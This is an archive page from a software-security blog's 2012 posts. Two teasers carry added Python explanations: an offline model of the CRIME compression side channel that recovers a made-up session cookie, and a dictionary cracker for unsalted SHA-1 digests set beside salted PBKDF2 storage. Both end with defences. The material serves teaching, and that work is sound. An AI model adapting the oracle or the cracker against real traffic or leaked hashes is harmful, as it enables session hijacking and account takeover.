Software Integrity

Archive for 2012

 

The 10 commandments for software security

You all know by now that the BSIMM is a descriptive model and not a prescriptive one.  We’re happy to give prescriptive advice about software security based on our experience as well.  It’s what we do for a living.  In fact, every prescriptive model (think the Touchpoints) needs to be measured with a measuring stick […]


Posted in Maturity Model (BSIMM), Penetration Testing, Software Security Testing

 

CRIME: Latest attack against TLS

A couple of days ago, information about a new attack (CRIME) against Transport Layer Security (TLS) was released. This attack was developed by the same researchers (Juliano Rizzo and Thai Duong) who developed the BEAST attack against SSL/TLS. Although details of the attack are not officially known yet, there is speculation (How can you protect […]
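The teaser above was written before the details were public. What CRIME turned out to be is a compression side channel: when a TLS-level compressor (DEFLATE) sees attacker-chosen plaintext in the same record as a secret cookie, the compressed length reveals how much of the attacker's guess matched the secret. The following Python is an added, offline model of that oracle; it is not code from the original post or from the researchers. The request layout, the cookie value, the hex alphabet and the padding bytes are all constructed here, and the compressor is pinned to static Huffman tables (Z_FIXED) so the length difference is exact rather than noisy.

```python
"""Constructed, offline model of the CRIME compression side channel."""
import zlib

# Constructed victim state: the browser attaches this cookie to every request.
# The attacker knows the cookie name and wants the hex value after it.
SECRET_COOKIE = b"sessionid=7f3a9c2e"
COOKIE_NAME = b"sessionid="
HEX = b"0123456789abcdef"


def build_request(path: bytes, cookie: bytes = SECRET_COOKIE) -> bytes:
    """Plaintext as a TLS-level compressor sees it: attacker-chosen path and
    victim-supplied cookie in the same record (constructed layout)."""
    return (b"GET /" + path + b" HTTP/1.1\r\nHost: example.com\r\n"
            b"Cookie: " + cookie + b"\r\n\r\n")


def compressed_len(plaintext: bytes) -> int:
    """Byte length after DEFLATE, which is all an on-path observer sees.
    Z_FIXED (static Huffman tables) keeps this model exact; real TLS
    compressors use dynamic tables, which add noise that the two-tries
    comparison below mostly absorbs."""
    comp = zlib.compressobj(level=9, strategy=zlib.Z_FIXED)
    return len(comp.compress(plaintext) + comp.flush())


def score_guess(known: bytes, c: bytes) -> int:
    """Two-tries oracle: compare 'known+c+pad' against 'known+pad+c'.
    A wrong c leaves both requests the same size.  The right c makes the
    first one shorter: the back-reference from the cookie into the path
    grows by one byte and one literal disappears.  The second round appends
    a byte >= 0x90 (a 9-bit literal in static Huffman) to shift the bit
    alignment, so a 7-bit saving cannot hide inside the final byte padding."""
    best = 0
    for align in (b"", b"\xa5"):
        pad = b"{}|^" + align  # bytes that occur nowhere else in the request
        try1 = compressed_len(build_request(known + c + pad))
        try2 = compressed_len(build_request(known + pad + c))
        best = max(best, try2 - try1)
    return best


def recover_cookie_value(known: bytes = COOKIE_NAME, alphabet: bytes = HEX,
                         max_len: int = 32) -> bytes:
    """Extend the known prefix one byte at a time, two request pairs per
    candidate.  Stop when no candidate shortens the request (end of the
    value) or more than one does (noise), rather than guess."""
    recovered = b""
    for _ in range(max_len):
        hits = [bytes([b]) for b in alphabet
                if score_guess(known + recovered, bytes([b])) > 0]
        if len(hits) != 1:
            break
        recovered += hits[0]
    return recovered


if __name__ == "__main__":
    print(recover_cookie_value())  # b'7f3a9c2e'
```

Each secret byte costs at most 2 × 16 requests here, and nothing in the loop needs the TLS key: only the ciphertext length on the wire. The defence that browsers and servers adopted is to turn TLS-level compression off; in Python's ssl module that is the OP_NO_COMPRESSION option, which create_default_context() sets.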


Posted in Software Security Testing

 

Securing password digests -or- How to protect lonely unemployed radio listeners

As we’re prone to say, “much ink has been spilt over the release of password digests” from LinkedIn and others. I’m, as is typical, profoundly disappointed in the amount of misinformation I’ve heard in security folks’ commentary on the problem and the underlying workings of digests, HMACs, and so forth. This blog entry represents a […]
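The LinkedIn digests that leaked were unsalted SHA-1, which is what makes a release of that kind so damaging: one lookup table built from a wordlist cracks every account at once. The following Python is an added example, not code from the post, showing that attack beside a salted, iterated construction (PBKDF2 with HMAC-SHA-256) where each record has to be attacked on its own. The leaked values, the wordlist, the record format and the iteration count are constructed for this example.

```python
"""Constructed example: lookup-table cracking of unsalted digests versus
per-record work against salted, iterated PBKDF2-HMAC records."""
import hashlib
import hmac
import os

# Constructed "leak": unsalted SHA-1 hex digests, the shape of the 2012 dump.
LEAKED_SHA1 = [
    hashlib.sha1(b"password").hexdigest(),
    hashlib.sha1(b"linkedin").hexdigest(),
    hashlib.sha1(b"correct horse battery staple").hexdigest(),
]
# Constructed attacker wordlist.
WORDLIST = [b"123456", b"password", b"linkedin", b"letmein", b"qwerty"]


def crack_unsalted_sha1(digests, wordlist):
    """One hash per word builds a table that is reused across every user;
    the cost is len(wordlist) regardless of how many digests leaked."""
    table = {hashlib.sha1(w).hexdigest(): w for w in wordlist}
    return {d: table[d] for d in digests if d in table}


def make_record(password: bytes, iterations: int = 200_000) -> str:
    """Salted, iterated record: a fresh 16-byte salt per user and PBKDF2
    with HMAC-SHA-256.  The record format and iteration count are this
    example's own choices, not a standard."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_record(record: str, password: bytes) -> bool:
    """Recompute from the stored salt and iteration count; compare in
    constant time so the check itself does not leak the digest."""
    algo, iterations, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record")
    dk = hashlib.pbkdf2_hmac("sha256", password, bytes.fromhex(salt_hex),
                             int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_salted(records, wordlist):
    """No shared table is possible: every (record, word) pair is a fresh
    PBKDF2 run of `iterations` HMAC calls.  Returns what was found and how
    many PBKDF2 runs it took."""
    found = {}
    runs = 0
    for rec in records:
        for w in wordlist:
            runs += 1
            if verify_record(rec, w):
                found[rec] = w
                break
    return found, runs


if __name__ == "__main__":
    print(crack_unsalted_sha1(LEAKED_SHA1, WORDLIST))
    rec = make_record(b"linkedin")
    print(verify_record(rec, b"linkedin"), verify_record(rec, b"password"))
    print(crack_salted([rec], WORDLIST)[1])  # 3 PBKDF2 runs for this record
```

The salt defeats precomputation and rainbow tables but not a dictionary attack on one weak password; the iteration count is what makes each attempt expensive, and it should be tuned to the hardware you run on rather than copied from an example like this one. An HMAC with a server-side key, the other construction the post mentions, adds a secret the attacker must also obtain before any offline guessing is possible.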


Posted in Threat Modeling

 

Caching security architecture knowledge with design patterns

We have always done architecture work. In the past, clients replaced their legacy systems with ‘new-fangled’ JavaEE, exploring platform features, an ecosystem of web frameworks, and related commercial products (Netegrity’s SiteMinder) as they went. Realizing they needed help, they looked to us for: Standards/Policy; JEE Platform Security Guide; JEE Security Specification (Requirements); Technology-specific standards; Reference Architecture; Security […]


Posted in Security Architecture, Software Security Testing